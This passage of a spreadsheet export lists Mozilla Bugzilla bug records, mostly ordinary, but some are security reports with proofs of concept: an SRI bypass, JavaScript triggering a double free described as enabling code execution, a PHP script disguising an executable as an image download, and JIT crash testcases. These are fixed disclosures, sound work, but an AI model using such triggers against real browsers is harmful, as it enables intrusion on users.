      <c r="C3943" t="inlineStr">
        <is>
          <t>SRI bypass: When &lt;link rel=preload integrity="sha512-correcthash"&gt; preloads a resource with the hash1, subresource requests with integrity="sha256-wronghash" also succeeds</t>
        </is>
      </c>
      <c r="D3943" t="inlineStr">
        <is>
          <t>2023-03-11 22:56:14 -0800</t>
        </is>
      </c>
      <c r="E3943" t="n">
        <v>1</v>
      </c>
      <c r="F3943" t="n">
        <v>1</v>
      </c>
      <c r="G3943" t="n">
        <v>3</v>
      </c>
      <c r="H3943" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3943" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3943" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K3943" t="inlineStr">
        <is>
          <t>Firefox 91</t>
        </is>
      </c>
      <c r="L3943" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3943" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3943" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3943" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3943" t="inlineStr">
        <is>
          <t>[domsecurity-backlog3][adv-main103+][adv-esr102.1+]</t>
        </is>
      </c>
      <c r="Q3943" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3943" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3943" t="inlineStr">
        <is>
          <t>104 Branch</t>
        </is>
      </c>
      <c r="T3943" t="n">
        <v>1</v>
      </c>
      <c r="U3943" t="n">
        <v>0</v>
      </c>
      <c r="V3943" t="n">
        <v>23</v>
      </c>
      <c r="W3943" t="inlineStr">
        <is>
          <t>Steps to reproduce:
foo.js's SHA512 hash is correcthash512 and SHA256 hash is correcthash256, not wronghash256.
Run the following HTML:
&lt;link rel="preload" as="script" href="foo.js" integrity="sha512-correcthash512"&gt;
&lt;script src="foo.js" integrity="sha256-wronghash256"&gt;&lt;/script&gt;
WPT version: Add the following sub test to the WPT /preload/subresource-integrity.html, inside the "if (supports_sri) {" block, and run the test:
      SRIPreloadTest(
        true,
        false,
        `Same-origin ${destination} with wrong digest does not reuse preload with correct and stronger digest.`,
        2,
        destination,
        same_origin_prefix + destination + ext + `?${token()}`,
        {integrity: sha512},
        {integrity: "sha256-deadbeefQ15RYHFvsYdWumweeFAw0hJDTFt9seErghA="}
      )
Actual results:
&lt;link rel=preload&gt; is successfully loaded, firing load event.
&lt;script&gt; is also successfully loaded, firing load event, even though its integrity attribute is wrong (that should be integrity="sha256-correcthash256" to be successful).
WPT: the added subtest fails because the load events of the main requests are fired:
FAIL Same-origin script with wrong digest does not reuse preload with correct and stronger digest. assert_unreached: Invalid subresource load succeeded. Reached unreachable code
I tested on Firefox 91.7.0esr on Linux.
So far I don't expect this is exploitable by attackers, but I'm filing this issue as an security issue just in case.
If an attacker can serve a malicious script as foo.js and inject &lt;link rel=preload&gt; with the SHA-512 of the malicious script, then SRI specified on &lt;script&gt; by the page author can be bypassed.
However, this needs injecting &lt;link rel=preload&gt; to the page, and if the attacker can inject &lt;link&gt;s, the attacker already can do more than the SRI bypassing.
I found this issue while reviewing https://github.com/whatwg/html/pull/7738, and this test case is stemming from:
&lt;li&gt;&lt;p&gt;the user-agent has determined that &lt;var&gt;entry&lt;/var&gt;'s &lt;span data-x="preload integrity
     metadata"&gt;integrity metadata&lt;/span&gt;'s algorithm is more collision-resistant than
     &lt;var&gt;integrityMetadata&lt;/var&gt;'s algorithm &lt;ref spec=SRI&gt;&lt;/p&gt;&lt;/li&gt;
Expected results:
&lt;link rel=preload&gt; is successfully loaded, firing load event.
&lt;script&gt; fails, firing error event, because the integrity attribute doesn't match foo.js.
WPT: the added subtest should pass.
Chromium behaves like this.
I expect the WPT would fail on Safari, but due to another broader underlying issue.</t>
        </is>
      </c>
      <c r="X3943" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3944">
      <c r="A3944" t="n">
        <v>134198</v>
      </c>
      <c r="B3944" t="inlineStr">
        <is>
          <t>2002-03-29 08:32:15 -0800</t>
        </is>
      </c>
      <c r="C3944" t="inlineStr">
        <is>
          <t>addition for step_by_step installation file</t>
        </is>
      </c>
      <c r="D3944" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:29 -0800</t>
        </is>
      </c>
      <c r="E3944" t="n">
        <v>1</v>
      </c>
      <c r="F3944" t="n">
        <v>1</v>
      </c>
      <c r="G3944" t="n">
        <v>4</v>
      </c>
      <c r="H3944" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3944" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3944" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K3944" t="inlineStr">
        <is>
          <t>2.14.1</t>
        </is>
      </c>
      <c r="L3944" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3944" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3944" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3944" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3944" t="inlineStr"/>
      <c r="Q3944" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3944" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3944" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T3944" t="n">
        <v>1</v>
      </c>
      <c r="U3944" t="n">
        <v>0</v>
      </c>
      <c r="V3944" t="n">
        <v>8</v>
      </c>
      <c r="W3944" t="inlineStr">
        <is>
          <t>Chapter 3.2.12 HTTP Server
I suggest updating:
---
With apache you'll also want to make sure that within the
	access.conf file the line:
 Options ExecCGI
is in the stanza that covers the directories into which
	you intend to put the bugzilla .html and .cgi files.
---
To:
---
With apache you'll also want to make sure that within the
	access.conf file the lines:
 Options ExecCGI
 AllowOverride Limit
are in the stanza that covers the directories into which
	you intend to put the bugzilla .html and .cgi files.
AllowOverride Limit allows the use of a Deny statement in the .htaccess file 
generated by checksetup.pl
---
Hope this helps,
Ward Vandewege.</t>
        </is>
      </c>
      <c r="X3944" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3945">
      <c r="A3945" t="n">
        <v>859892</v>
      </c>
      <c r="B3945" t="inlineStr">
        <is>
          <t>2013-04-09 10:16:28 -0700</t>
        </is>
      </c>
      <c r="C3945" t="inlineStr">
        <is>
          <t>WebGL data-view-test.html crash [@ js::types::TypeMonitorResult(JSContext*, JSScript*, unsigned char*, JS::Value const&amp;) ]</t>
        </is>
      </c>
      <c r="D3945" t="inlineStr">
        <is>
          <t>2015-02-25 20:16:45 -0800</t>
        </is>
      </c>
      <c r="E3945" t="n">
        <v>1</v>
      </c>
      <c r="F3945" t="n">
        <v>1</v>
      </c>
      <c r="G3945" t="n">
        <v>3</v>
      </c>
      <c r="H3945" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3945" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3945" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3945" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3945" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3945" t="inlineStr">
        <is>
          <t>Windows 8</t>
        </is>
      </c>
      <c r="N3945" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3945" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3945" t="inlineStr">
        <is>
          <t>[adv-main25+][adv-esr24-1+]</t>
        </is>
      </c>
      <c r="Q3945" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3945" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3945" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T3945" t="n">
        <v>1</v>
      </c>
      <c r="U3945" t="n">
        <v>0</v>
      </c>
      <c r="V3945" t="n">
        <v>46</v>
      </c>
      <c r="W3945" t="inlineStr">
        <is>
          <t>https://www.khronos.org/registry/webgl/sdk/tests/conformance/typedarrays/data-view-test.html
crashes on load in the 20130408 windows 32-bit nightly.  All crashes are at:
https://crash-stats.mozilla.com/report/index/bp-f1a443a7-070a-4211-bed2-8690c2130409</t>
        </is>
      </c>
      <c r="X3945" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3946">
      <c r="A3946" t="n">
        <v>474456</v>
      </c>
      <c r="B3946" t="inlineStr">
        <is>
          <t>2009-01-20 10:22:10 -0800</t>
        </is>
      </c>
      <c r="C3946" t="inlineStr">
        <is>
          <t>[1.9.0]Mozilla Firefox XUL Linked Clones Double Free Vulnerability (ZDI-CAN-423)</t>
        </is>
      </c>
      <c r="D3946" t="inlineStr">
        <is>
          <t>2009-10-27 23:07:44 -0700</t>
        </is>
      </c>
      <c r="E3946" t="n">
        <v>1</v>
      </c>
      <c r="F3946" t="n">
        <v>1</v>
      </c>
      <c r="G3946" t="n">
        <v>3</v>
      </c>
      <c r="H3946" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3946" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3946" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K3946" t="inlineStr">
        <is>
          <t>1.9.0 Branch</t>
        </is>
      </c>
      <c r="L3946" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3946" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3946" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3946" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3946" t="inlineStr">
        <is>
          <t>[sg:critical] fixed in 1.9.1+ by bug 457022, 1.9.0-only</t>
        </is>
      </c>
      <c r="Q3946" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3946" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3946" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T3946" t="n">
        <v>1</v>
      </c>
      <c r="U3946" t="n">
        <v>0</v>
      </c>
      <c r="V3946" t="n">
        <v>25</v>
      </c>
      <c r="W3946" t="inlineStr">
        <is>
          <t>TippingPoint has identified a vulnerability affecting the following 
products: Mozilla Firefox 3.0.x
-- VULNERABILITY DETAILS -----------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page.
The specific flaw exists during the browsers garbage collection process.
When multiple DOM elements are cloned and linked to one another and the
browser is reloaded a memory corruption occurs resulting in a double
free. This can be leveraged to execute arbitrary code under the context
of the current user.
The following basic JavaScript will reproduce the issue:
body = document.getElementById('mainbody');
noti = document.createElementNS(xulns,'notification');
body.appendChild(noti);
elem = document.createElement("div");
statusbar = document.createElementNS(xulns,'statusbarpanel');
clone = statusbar.cloneNode(1);
elem.appendChild(clone);
for(var x=0;x&lt;10;x++) hs();
location.reload()
The body element must be connected to the DOM. After a few reloads of
the website the browser will crash, in most cases during garbage
collection, because it tries to free an object twice. The elem object
can be any element (HTML, SVG, XUL, etc.) The notification object has to
be created and appended to the body element. Just cloning the
statusbarpanel object and appending it to any element, will not trigger
the vulnerability.
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * Anonymous</t>
        </is>
      </c>
      <c r="X3946" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3947">
      <c r="A3947" t="n">
        <v>293527</v>
      </c>
      <c r="B3947" t="inlineStr">
        <is>
          <t>2005-05-09 14:25:20 -0700</t>
        </is>
      </c>
      <c r="C3947" t="inlineStr">
        <is>
          <t>"Save Image As" context menu allows to silently save executables instead of images</t>
        </is>
      </c>
      <c r="D3947" t="inlineStr">
        <is>
          <t>2007-04-01 15:03:50 -0700</t>
        </is>
      </c>
      <c r="E3947" t="n">
        <v>1</v>
      </c>
      <c r="F3947" t="n">
        <v>1</v>
      </c>
      <c r="G3947" t="n">
        <v>2</v>
      </c>
      <c r="H3947" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3947" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3947" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3947" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3947" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3947" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3947" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3947" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3947" t="inlineStr">
        <is>
          <t>[sg:spoof]</t>
        </is>
      </c>
      <c r="Q3947" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3947" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3947" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3947" t="n">
        <v>1</v>
      </c>
      <c r="U3947" t="n">
        <v>0</v>
      </c>
      <c r="V3947" t="n">
        <v>25</v>
      </c>
      <c r="W3947" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3
The context menu option "Save Image As" does not validate if the src image is
valid. By using absolute positioning and the moz-opacity filter an attacker can
easily fool the user to think he is going to save a valid image but is
downloading an executable file instead.
Since file extensions are default disabled on windows and an exe files can have
any file icon - including the standard image icon - the user can only tell the
difference when he recognizes that the save dialog file type drop down shows
"Application" instead of an image file. Unlikely average users will see that or
realize the consequences. Probably most poeple will just double-click the "image
file" they downloaded when they are going to view it and will run the executable
in that moment. 
Reproducible: Always
Steps to Reproduce:
1. Open http://bugzilla:Ha8T4wc@www.mikx.de/firesaving/
2. Follow instructions
It seems Firefox sometimes raises an "the web page might have been removed or
its name changed" error when supplying a larger exe directly as an image source
and then trying to save it (is that a bug or a security feature?). Anyway, an
attacker can work around this problem with a little php script like this:
$fp = fopen("exe.exe", "rb");
header("Content-Type: image/gif");
header("Content-Disposition: inline; filename=booom.exe");
fpassthru($fp);
fclose($fp);</t>
        </is>
      </c>
      <c r="X3947" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3948">
      <c r="A3948" t="n">
        <v>1268626</v>
      </c>
      <c r="B3948" t="inlineStr">
        <is>
          <t>2016-04-28 12:17:58 -0700</t>
        </is>
      </c>
      <c r="C3948" t="inlineStr">
        <is>
          <t>Crash [@ ??] or Assertion failure: MIR instruction returned value with unexpected type, at js/src/jit/MacroAssembler.cpp:1454</t>
        </is>
      </c>
      <c r="D3948" t="inlineStr">
        <is>
          <t>2016-09-22 17:25:15 -0700</t>
        </is>
      </c>
      <c r="E3948" t="n">
        <v>1</v>
      </c>
      <c r="F3948" t="n">
        <v>1</v>
      </c>
      <c r="G3948" t="n">
        <v>3</v>
      </c>
      <c r="H3948" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3948" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3948" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3948" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3948" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3948" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3948" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3948" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3948" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main48+][adv-esr45.3+]</t>
        </is>
      </c>
      <c r="Q3948" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3948" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3948" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T3948" t="n">
        <v>1</v>
      </c>
      <c r="U3948" t="n">
        <v>0</v>
      </c>
      <c r="V3948" t="n">
        <v>21</v>
      </c>
      <c r="W3948" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 4292da9df16b (build with --enable-debug --enable-more-deterministic, run with --fuzzing-safe --no-threads --ion-eager):
x = y = [];
x.shift(y);
x.push(y);
x.splice(14, ({
    valueOf: function() {
        x.shift(y);
    }
}), y);
x.forEach(function() {});
x.forEach(function() {});
Backtrace:
0   ???                           	0x00000001026a4888 0 + 4335487112
For detailed crash information, see attachment.
Variant:
x = y = [];
x.unshift(y);
x.push(y);
x.splice(14, ({
    valueOf: function() {
        x.shift(y);
    }
}), y);
x.forEach(function() {});
x.forEach(function() {});
Process 34906 stopped
* thread #1: tid = 0x501ff8, 0x00000001027b1ed8, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x0)
    frame #0: 0x00000001027b1ed8
-&gt;  0x1027b1ed8: movq   (%rcx), %rax
    0x1027b1edb: movabsq $0x102670820, %r11        ; imm = 0x102670820
    0x1027b1ee5: cmpq   %r11, %rax
    0x1027b1ee8: jne    0x1027b1ef3
(lldb) bt
* thread #1: tid = 0x501ff8, 0x00000001027b1ed8, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x0)
  * frame #0: 0x00000001027b1ed8
(lldb)
Assertion failure message involves MIR -&gt; s-s by default. Bisection seems to show that it goes way back prior to m-c rev dc4b163f7db7 (early Nov 2014)</t>
        </is>
      </c>
      <c r="X3948" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3949">
      <c r="A3949" t="n">
        <v>787089</v>
      </c>
      <c r="B3949" t="inlineStr">
        <is>
          <t>2012-08-30 08:41:47 -0700</t>
        </is>
      </c>
      <c r="C3949" t="inlineStr">
        <is>
          <t>Crash [@ nsStyleContext::GetRuleNode()] with deleted this</t>
        </is>
      </c>
      <c r="D3949" t="inlineStr">
        <is>
          <t>2014-01-10 10:40:07 -0800</t>
        </is>
      </c>
      <c r="E3949" t="n">
        <v>1</v>
      </c>
      <c r="F3949" t="n">
        <v>1</v>
      </c>
      <c r="G3949" t="n">
        <v>3</v>
      </c>
      <c r="H3949" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3949" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3949" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K3949" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3949" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3949" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3949" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3949" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3949" t="inlineStr">
        <is>
          <t>[adv-track-main17+][adv-track-esr17-]</t>
        </is>
      </c>
      <c r="Q3949" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3949" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3949" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T3949" t="n">
        <v>1</v>
      </c>
      <c r="U3949" t="n">
        <v>0</v>
      </c>
      <c r="V3949" t="n">
        <v>26</v>
      </c>
      <c r="W3949" t="inlineStr">
        <is>
          <t>1. http://altfoto.com/2012/08/el-sucio-sucio-secreto-de-las-grandes-marcas-y-sus-sensores-defectuosos
2. Crash nsStyleContext::GetRuleNode() nsIFrame::PresContext() nsRootPresContext::RequestUpdatePluginGeometry(nsIFrame*) PresShell::DoReflow(nsIFrame*, bool) PresShell::ProcessReflowCommands(bool)
Nightly Linux 32bit and Windows 7 64bit
See bug 781279 comment 15
crash address in Windows when you don't get a Flash related crash is 0xffffffffddddddf9 while in Linux it is 0xdadadaf6
On Linux I see nsStyleContext::GetRuleNode (this=0xdadadada) at ../../dist/include/nsStyleContext.h:190
bp-e7968d4a-42bb-4df7-98ef-920df2120830
Not very reproducible in opt build but pretty much so in debug.</t>
        </is>
      </c>
      <c r="X3949" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3950">
      <c r="A3950" t="n">
        <v>242405</v>
      </c>
      <c r="B3950" t="inlineStr">
        <is>
          <t>2004-05-03 02:43:18 -0700</t>
        </is>
      </c>
      <c r="C3950" t="inlineStr">
        <is>
          <t>Turning on QA contact causes taint error in Bugzilla/Series.pm when adding a component</t>
        </is>
      </c>
      <c r="D3950" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:39 -0800</t>
        </is>
      </c>
      <c r="E3950" t="n">
        <v>1</v>
      </c>
      <c r="F3950" t="n">
        <v>1</v>
      </c>
      <c r="G3950" t="n">
        <v>4</v>
      </c>
      <c r="H3950" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3950" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3950" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K3950" t="inlineStr">
        <is>
          <t>2.17.7</t>
        </is>
      </c>
      <c r="L3950" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3950" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3950" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3950" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3950" t="inlineStr"/>
      <c r="Q3950" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3950" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3950" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T3950" t="n">
        <v>1</v>
      </c>
      <c r="U3950" t="n">
        <v>0</v>
      </c>
      <c r="V3950" t="n">
        <v>21</v>
      </c>
      <c r="W3950" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7b) Gecko/20040316
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7b) Gecko/20040316
I had my bugzilla upgraded from 2.16.2. Truned on the QA contact, now that I see
"missing" in all of the components, which is of cause a OK as I don't have that
before.
Then I added a new component to the list, however I received the following error:
Software error:
Insecure dependency in parameter 1 of DBI::db=HASH(0x860957c)-&gt;do method call
while running with -T switch at Bugzilla/Series.pm line 184.
For help, please send mail to the webmaster (vcad_webmaster@cadence.com), giving
this error message and the time and date of the error. 
However, as I look into the database, the new component is added to the
component list.
Then I tried to add a new bug to the new component, ooops, failed as Bugzilla is
suffering from "internal error" and cannot proceed further. As i can tell,
edit/add bugs are still fine for old components, just those components created
after the upgrade are tied to this problem.
Then if I turned the QA contact off in the edit param page, all goes fine,
edit/add either old existing components, or newly created components are
proceeded as normal.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
        </is>
      </c>
      <c r="X3950" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3951">
      <c r="A3951" t="n">
        <v>869560</v>
      </c>
      <c r="B3951" t="inlineStr">
        <is>
          <t>2013-05-07 11:01:06 -0700</t>
        </is>
      </c>
      <c r="C3951" t="inlineStr">
        <is>
          <t>multiple failed uploads with ssh permission denied</t>
        </is>
      </c>
      <c r="D3951" t="inlineStr">
        <is>
          <t>2015-03-12 08:17:16 -0700</t>
        </is>
      </c>
      <c r="E3951" t="n">
        <v>1</v>
      </c>
      <c r="F3951" t="n">
        <v>1</v>
      </c>
      <c r="G3951" t="n">
        <v>6</v>
      </c>
      <c r="H3951" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3951" t="inlineStr">
        <is>
          <t>mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J3951" t="inlineStr">
        <is>
          <t>Server Operations</t>
        </is>
      </c>
      <c r="K3951" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3951" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3951" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3951" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3951" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3951" t="inlineStr">
        <is>
          <t>[buildduty]</t>
        </is>
      </c>
      <c r="Q3951" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3951" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3951" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3951" t="n">
        <v>1</v>
      </c>
      <c r="U3951" t="n">
        <v>0</v>
      </c>
      <c r="V3951" t="n">
        <v>12</v>
      </c>
      <c r="W3951" t="inlineStr">
        <is>
          <t>trees are closed right now because some hosts can't upload files to upload1</t>
        </is>
      </c>
      <c r="X3951" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3952">
      <c r="A3952" t="n">
        <v>20785</v>
      </c>
      <c r="B3952" t="inlineStr">
        <is>
          <t>1999-12-04 01:27:07 -0800</t>
        </is>
      </c>
      <c r="C3952" t="inlineStr">
        <is>
          <t>[DOGFOOD] dialog controls bust 2nd time dialog is displayed</t>
        </is>
      </c>
      <c r="D3952" t="inlineStr">
        <is>
          <t>2019-03-13 06:46:04 -0700</t>
        </is>
      </c>
      <c r="E3952" t="n">
        <v>1</v>
      </c>
      <c r="F3952" t="n">
        <v>1</v>
      </c>
      <c r="G3952" t="n">
        <v>3</v>
      </c>
      <c r="H3952" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3952" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3952" t="inlineStr">
        <is>
          <t>DOM: UI Events &amp; Focus Handling</t>
        </is>
      </c>
      <c r="K3952" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3952" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3952" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3952" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3952" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3952" t="inlineStr"/>
      <c r="Q3952" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3952" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3952" t="inlineStr">
        <is>
          <t>M12</t>
        </is>
      </c>
      <c r="T3952" t="n">
        <v>1</v>
      </c>
      <c r="U3952" t="n">
        <v>0</v>
      </c>
      <c r="V3952" t="n">
        <v>9</v>
      </c>
      <c r="W3952" t="inlineStr">
        <is>
          <t>For example, open the prefs dialog, click "ok" to close it. Re-open, "ok" and
"cancel" don't work.
This is either related to my master document brutal sharing that I landed
tonight, or the recent script sharing stuff that brendan has landed. Setting
the "Disable XUL Cache" pref allows you to work aroun the problem.</t>
        </is>
      </c>
      <c r="X3952" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3953">
      <c r="A3953" t="n">
        <v>432986</v>
      </c>
      <c r="B3953" t="inlineStr">
        <is>
          <t>2008-05-09 06:21:01 -0700</t>
        </is>
      </c>
      <c r="C3953" t="inlineStr">
        <is>
          <t>Get 1.8 staging running again</t>
        </is>
      </c>
      <c r="D3953" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3953" t="n">
        <v>1</v>
      </c>
      <c r="F3953" t="n">
        <v>1</v>
      </c>
      <c r="G3953" t="n">
        <v>5</v>
      </c>
      <c r="H3953" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3953" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3953" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3953" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3953" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3953" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3953" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3953" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3953" t="inlineStr"/>
      <c r="Q3953" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
